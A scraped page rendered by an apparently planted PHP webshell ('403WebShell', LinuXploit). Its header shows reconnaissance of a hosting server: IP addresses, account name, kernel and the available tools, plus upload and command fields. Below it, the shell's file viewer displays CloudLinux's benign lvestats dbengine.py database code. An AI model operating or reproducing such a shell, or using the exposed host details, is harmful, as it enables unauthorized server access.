Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.219.81.129
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib//dbengine.py
# coding=utf-8
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

import logging
import pathlib

import sqlalchemy.engine
from sqlalchemy import delete, func
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.engine.url import make_url
from sqlalchemy.ext.declarative.clsregistry import _ModuleMarker
from sqlalchemy.orm import RelationshipProperty, sessionmaker

from clcommon import mysql_lib
from clcommon.clexception import FormattedException
from lvestats.orm import Base, history
from lvestats.orm import LVE_STATS_2_TABLENAME_PREFIX
from lvestats.utils.dbmigrator import alembic_migrate

# SQLite database file used when the config does not provide "sqlite_db_path"
DEFAULT_DB_PATH = '/var/lve/lvestats2.db'

# Values accepted for the "db_type" config option
MYSQL = 'mysql'
POSTGRESQL = 'postgresql'
SQLITE = 'sqlite'
SUPPORTED_DATABASES = [MYSQL, POSTGRESQL, SQLITE]

# Client library name placed after "+" in the connection uri, per database type
DB_CLIENT_LIBRARY_MAP = {MYSQL: 'pymysql', POSTGRESQL: 'psycopg2'}

__author__ = 'shaman'


def find_not_existing_tables_or_views(engine, names):
    """
    Return those of the given names that have no matching view in the database.

    Each name is looked up with LVE_STATS_2_TABLENAME_PREFIX prepended. Only
    the view names reported by the inspector are consulted.

    :param sqlalchemy.engine.base.Engine engine: engine of the database to inspect
    :param names: iterable of names without the table name prefix
    :return tuple: missing names (without prefix), each once, in input order
    """
    inspector = Inspector.from_engine(engine)
    existing = set(inspector.get_view_names())
    # Filter the caller's names directly instead of stripping the prefix from
    # the prefixed ones: str.replace() would also cut out any later occurrence
    # of the prefix inside a name. dict.fromkeys() drops duplicates while
    # keeping the input order, so the result is deterministic.
    return tuple(
        name
        for name in dict.fromkeys(names)
        if LVE_STATS_2_TABLENAME_PREFIX + name not in existing
    )


def get_list_of_tables_without_views():
    """
    Build the list of tables that create_db() passes to Base.metadata.create_all().
    Tables that belong to a disabled feature are left out.
    NOTE(review): the only filtering visible here is by feature flag; confirm
    how views are kept out of Base.metadata.tables.
    :return list: table objects taken from Base.metadata.tables
    """
    # snapshot of the registered tables
    all_tables = list(Base.metadata.tables.values())

    # the bursting events table is skipped unless the feature flag file exists
    flag_file = pathlib.Path('/opt/cloudlinux/flags/enabled-flags.d/burstable-limits.flag')
    skipped_names = set()
    if not flag_file.exists():
        skipped_names.add(LVE_STATS_2_TABLENAME_PREFIX + 'bursting_events')

    return [table for table in all_tables if table.name not in skipped_names]


class MakeDbException(FormattedException):
    """Raised by make_db_engine() when the database connection cannot be configured."""


class DatabaseConfigError(FormattedException):
    """Raised when the database settings in the config are missing or not usable."""


def cfg_get_uri(cfg, check_support=True):
    """
    Extract and validate database connection uri from config

    For SQLite the uri is built from "sqlite_db_path" (DEFAULT_DB_PATH when
    absent). For any other database it is
    "<db_type>+<client library>://<connect_string>", passed through
    get_fixed_uri().

    :param dict cfg: config; reads "db_type", "connect_string" and "sqlite_db_path"
    :param bool check_support: reject "db_type" values not in SUPPORTED_DATABASES
    :return str: database uri
    :raises DatabaseConfigError: "db_type" is missing or not supported,
        "connect_string" is missing for a non-SQLite database, or no client
        library is known for the database type
    """
    # check present "db_type"
    db_type = cfg.get('db_type')
    if db_type is None:
        raise DatabaseConfigError(
            {'message': '"%(config_variable)s" not in config', 'context': {'config_variable': 'db_type'}}
        )

    # check supported databases
    if check_support and db_type not in SUPPORTED_DATABASES:
        # Quote every name individually; joining with '", "' alone left the
        # first and the last name with unbalanced quotes in the message.
        supported = ', '.join(f'"{name}"' for name in SUPPORTED_DATABASES)
        raise DatabaseConfigError(
            {
                'message': 'Incorrect database type %(database_type)s. You should only use %(database_types)s. '
                'The correct db_type for mariadb is "mysql"',
                'context': {'database_type': db_type, 'database_types': supported},
            }
        )

    # check present "connect_string" (SQLite uses a file path instead)
    connect_string = cfg.get('connect_string')
    if db_type != SQLITE and connect_string is None:
        raise DatabaseConfigError(
            {'message': '"%(config_variable)s" not in config', 'context': {'config_variable': 'connect_string'}}
        )

    # generate database uri
    if db_type == SQLITE:
        uri = f'{db_type}:///{cfg.get("sqlite_db_path", DEFAULT_DB_PATH)}'
    else:
        client_library = get_db_client_library_name(db_type)
        uri = f'{db_type}+{client_library}://{connect_string}'
        uri = get_fixed_uri(db_type, uri)
    return uri


def make_db_engine(cfg, just_print=False, debug=False, pool_class=None, check_support=True):
    """
    Create sqlalchemy database engine
    :param dict cfg: config; the uri is derived from it by cfg_get_uri()
    :param bool just_print: build a mock engine that prints statements instead of running them
    :param bool debug: engine "echo" flag; when left False, cfg["debug"] is used if present
    :param pool_class: passed to create_engine() as "poolclass"
    :param bool check_support: forwarded to cfg_get_uri()
    :return: sqlalchemy engine
    :raises MakeDbException: the config does not describe a usable connection
    """
    logger = logging.getLogger('init_db_engine')

    try:
        db_uri = cfg_get_uri(cfg, check_support=check_support)
    except DatabaseConfigError as config_error:
        error_template = 'Unable to configure database connection. %(error)s'
        error_context = {'error': str(config_error)}
        logger.error(error_template, error_context)
        raise MakeDbException({'message': error_template, 'context': error_context}) from config_error

    logger.info('Connecting to database: %s', cfg['db_type'])

    # an explicit debug argument wins over the config value
    if debug is False and 'debug' in cfg:
        debug = cfg['debug']

    if not just_print:
        return sqlalchemy.engine.create_engine(db_uri, echo=debug, poolclass=pool_class)

    def print_statement(sql, *multiparams, **params):
        print(sql)

    return sqlalchemy.engine.create_engine(db_uri, strategy='mock', executor=print_statement)


def validate_database(engine, hide_logging=False, base=Base):
    """
    Compare the ORM models registered on ``base`` with the actual database schema.

    Every missing table or column is reported with a critical log message.

    :param sqlalchemy.engine.base.Engine engine: engine of the database to inspect
    :param bool hide_logging: keep this function's messages away from the
        ancestor loggers' handlers for the duration of the call only
    :param base: declarative base whose class registry is checked
    :return dict: "table_error" and "column_error" flags plus the
        "missing_tables" and "orm_tables" lists of table names
    """
    log = logging.getLogger('validate_database')
    # The logger is shared process-wide, so the silencing is undone in the
    # "finally" below; otherwise every call would pile up one more NullHandler
    # and later calls with hide_logging=False would stay silent as well.
    silencer = None
    saved_propagate = log.propagate
    if hide_logging:
        silencer = logging.NullHandler()
        log.propagate = False
        log.addHandler(silencer)
    try:
        result = {"table_error": False, "column_error": False, "missing_tables": [], "orm_tables": []}
        database_inspection = Inspector.from_engine(engine)
        real_tables = database_inspection.get_table_names()
        # iterate over a snapshot of the registry
        for _class in list(base._decl_class_registry.values()):  # pylint: disable=protected-access
            if isinstance(_class, _ModuleMarker):
                continue
            table = _class.__tablename__
            result['orm_tables'].append(table)
            if table not in real_tables:
                log.critical("Model %s declares table %s which does not exist in database %s", _class, table, engine)
                result["table_error"] = True
                result["missing_tables"].append(table)
                continue
            real_columns = {c["name"] for c in database_inspection.get_columns(table)}
            mapper = sqlalchemy.inspect(_class)
            for column_prop in mapper.attrs:
                if isinstance(column_prop, RelationshipProperty):
                    # We have no relationships
                    continue
                for column in column_prop.columns:
                    if column.key not in real_columns:
                        log.critical(
                            "Model %s declares column %s which does not exist in database %s",
                            _class,
                            column.key,
                            engine,
                        )
                        result["column_error"] = True
        if result["table_error"]:
            log.critical("You can run 'lve-create-db --create-missing-tables' command to recreate missing tables.")
        if result["column_error"]:
            log.critical("You can try to recreate malformed table, or ask CloudLinux support for help.")
        return result
    finally:
        if silencer is not None:
            log.removeHandler(silencer)
            log.propagate = saved_propagate


def check_need_create_db(engine):
    """
    Tell whether the list of missing tables equals the list of all ORM tables,
    i.e. none of the declared tables exists yet.
    Validation is run with hide_logging=True.
    :param engine: sqlalchemy engine of the database to check
    :return bool:
    """
    report = validate_database(engine, hide_logging=True)
    missing_tables = report['missing_tables']
    orm_tables = report['orm_tables']
    return missing_tables == orm_tables


def create_db(engine):
    """
    Create the tables returned by get_list_of_tables_without_views() and stamp
    the database with the alembic revision.
    :param engine: sqlalchemy engine of the target database
    """
    wanted_tables = get_list_of_tables_without_views()
    Base.metadata.create_all(engine, tables=wanted_tables)
    # the revision is written only once all tables have been created
    alembic_migrate(engine, stamp=True)


def setup_db(engine, create_missing_tables=False, cfg=None):
    """
    Bring the database schema up to date.
    Tables are created when requested explicitly or when check_need_create_db()
    reports that they are needed; otherwise the alembic migration is run.
    :param engine: sqlalchemy engine of the target database
    :param bool create_missing_tables: create tables without checking the database first
    :param cfg: passed to alembic_migrate() as "lve_stats_cfg"
    """
    if not create_missing_tables and not check_need_create_db(engine):
        alembic_migrate(engine, lve_stats_cfg=cfg)
        return
    create_db(engine)


def drop_tables(engine):
    """
    Drop everything registered in Base.metadata from the database.
    :param engine: sqlalchemy engine of the target database
    """
    metadata = Base.metadata
    metadata.drop_all(engine)


def clear_rows(engine, server_id=None):
    """
    Delete rows from every table registered in Base.metadata.

    All deletes run in one transaction, which is rolled back if any of them fails.

    :param engine: sqlalchemy engine of the target database
    :param server_id: None deletes all rows; a list or tuple deletes the rows
        whose server_id is one of its items; any other value deletes the rows
        with exactly that server_id
    """
    conn_ = engine.connect()
    try:
        trans = conn_.begin()  # delete all rows in one transaction
        try:
            for table_object in list(Base.metadata.tables.values()):
                delete_query = delete(table_object)
                if isinstance(server_id, (list, tuple)):
                    # Python's "in" operator would collapse to a plain bool
                    # here; in_() is what renders an SQL IN clause.
                    delete_query = delete_query.where(table_object.c.server_id.in_(server_id))
                elif server_id is not None:
                    delete_query = delete_query.where(table_object.c.server_id == server_id)
                conn_.execute(delete_query)
            trans.commit()
        except Exception:
            trans.rollback()
            raise
    finally:
        # give the connection back even when a delete fails
        conn_.close()


def recreate_db(engine):
    """
    Drop the tables and create them again.
    :param engine: sqlalchemy engine of the target database
    """
    for step in (drop_tables, create_db):
        step(engine)


def find_lost_keep_alive(session, server_id, from_timestmp=None, to_timestamp=None):
    """
    Find the timestamps for which the keepalive record is lost.

    Equivalent query:
        SELECT created FROM <history table> WHERE server_id = :server_id
        GROUP BY created HAVING max(id) > 0 AND min(id) > 0
    with optional bounds on "created".

    :param session: sqlalchemy session
    :param server_id: server whose history rows are examined
    :param from_timestmp: inclusive lower bound for "created", or None
    :param to_timestamp: inclusive upper bound for "created", or None
    :return list: matching "created" values
    """
    criteria = [history.server_id == server_id]
    if to_timestamp is not None:
        criteria.append(history.created <= to_timestamp)
    if from_timestmp is not None:
        criteria.append(history.created >= from_timestmp)

    query = (
        session.query(history.created)
        .filter(*criteria)
        .group_by(history.created)
        .having(func.max(history.id) > 0)
        .having(func.min(history.id) > 0)
    )
    return [row[0] for row in query]


def fix_lost_keep_alive(session, server_id, from_timestmp=None, to_timestamp=None, log_=None):
    """
    Add a keepalive history record for every timestamp reported by
    find_lost_keep_alive() and commit the session.

    Nothing is added or committed when no timestamps are reported.

    :param session: sqlalchemy session
    :param server_id: server whose history is repaired
    :param from_timestmp: inclusive lower bound for "created", or None
    :param to_timestamp: inclusive upper bound for "created", or None
    :param log_: optional logger that receives a summary of the added records
    """
    missing_timestamps = find_lost_keep_alive(session, server_id, from_timestmp, to_timestamp)
    if missing_timestamps:
        # a keepalive row has every column set to 0, except server_id and created
        row_template = dict.fromkeys(history.__table__.columns.keys(), 0)
        row_template[history.server_id.key] = server_id

        for created_at in missing_timestamps:
            record = history(**row_template)
            record.created = created_at
            session.add(record)
        session.commit()
        if log_:
            log_.info('Was fixed %s losted keep alive records: %s', len(missing_timestamps), missing_timestamps)


def fix_db(engine, cfg, from_timestmp=None, to_timestamp=None, log_=None):
    """
    Restore lost keepalive records for the server named in the config.

    :param engine: sqlalchemy engine of the target database
    :param dict cfg: config; "server_id" is read from it
    :param from_timestmp: inclusive lower bound for "created", or None
    :param to_timestamp: inclusive upper bound for "created", or None
    :param log_: optional logger forwarded to fix_lost_keep_alive()
    """
    # the session is created with the sessionmaker defaults
    session = sessionmaker(bind=engine)()
    try:
        fix_lost_keep_alive(
            session, cfg['server_id'], from_timestmp=from_timestmp, to_timestamp=to_timestamp, log_=log_
        )
    finally:
        # close the session even when the fix fails
        session.close()


def get_db_client_library_name(db_type):
    """
    Look up the Python client library used to connect to the given database
    :param str db_type: database type, a key of DB_CLIENT_LIBRARY_MAP
    :return str: client library name
    :raises DatabaseConfigError: no client library is registered for db_type
    """
    library_name = DB_CLIENT_LIBRARY_MAP.get(db_type)
    if library_name is not None:
        return library_name

    error_details = {
        'message': 'The client library to connect to the "%(database_type)s" database cannot be detected',
        'context': {'database_type': db_type},
    }
    raise DatabaseConfigError(error_details)


def get_fixed_uri(db_type, uri):
    """
    Adjust the connection URI for the specified database.
    Only MySQL URIs are changed: they are parsed with make_url() and passed
    through mysql_lib.get_rfc1738_db_uri(). Any other URI is returned as is.
    :param str db_type: database type
    :param str uri: connection URI
    :return str: URI to connect with
    """
    if db_type == MYSQL:
        parsed_url = make_url(uri)
        fixed_url = mysql_lib.get_rfc1738_db_uri(parsed_url)
        return str(fixed_url)
    return uri

Youez - 2016 - github.com/yon3zu
LinuXploit